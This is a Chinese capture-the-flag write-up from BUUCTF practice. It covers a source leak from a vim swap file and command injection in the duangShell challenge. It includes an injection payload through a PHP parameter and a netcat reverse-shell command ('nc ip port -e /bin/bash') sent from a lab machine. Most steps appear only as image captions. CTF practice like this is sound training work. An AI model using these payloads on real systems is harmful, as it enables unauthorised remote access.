首页 > 其他分享 >[BUUCTF]第一天训练

[BUUCTF]第一天训练

时间:2022-10-31 10:01:06浏览次数:52  
标签:姿势 __ BUUCTF 第一天 训练 duangShell 2019 靶机 反弹


文章目录

  • ​​[BSidesCF 2019]Futurella​​
  • ​​[BJDCTF 2nd]duangShell​​
  • ​​反弹姿势1(未成功)​​
  • ​​反弹姿势2​​

[BSidesCF 2019]Futurella

好久没看过这么简单的题目了,哇哇哇

整了个火星文,看不懂查看源代码

[BUUCTF]第一天训练_linux

[BUUCTF]第一天训练_linux_02

[BJDCTF 2nd]duangShell

点进去发现是swp源码泄露

[BUUCTF]第一天训练_内网_03


利用​​vim -r index.php.swp​​恢复文件

[BUUCTF]第一天训练_linux_04


这里我知道了exec函数与system类似但是没有回显,所以我传入的参数​​girl_friend=print_r(scandir(dirname(__FILE__)))​​会没有显示

看了别人的wp,发现我们只能用反弹shell的方法了,根据提示

[BUUCTF]第一天训练_ide_05


由于这题的环境靶机无法访问外网,所以需要一个内网靶机来做,这里就直接用了题目中推荐的Basic中的Linux Labs,由于这台靶机已经安装了lamp,已指出http服务,利用xshell连接主机

[BUUCTF]第一天训练_linux_06


[BUUCTF]第一天训练_ide_07

反弹姿势1(未成功)

[BUUCTF]第一天训练_ide_08


[BUUCTF]第一天训练_ide_09


开启

[BUUCTF]第一天训练_linux_10


反弹shell

[BUUCTF]第一天训练_内网_11


不知道为啥通不了迷惑???

反弹姿势2

post参数:​​nc ip port -e /bin/bash​

[BUUCTF]第一天训练_ide_12

[BUUCTF]第一天训练_linux_13


这个靶机真垃圾

[BUUCTF]第一天训练_内网_14


标签:姿势,__,BUUCTF,第一天,训练,duangShell,2019,靶机,反弹
From: https://blog.51cto.com/u_15847702/5808298

相关文章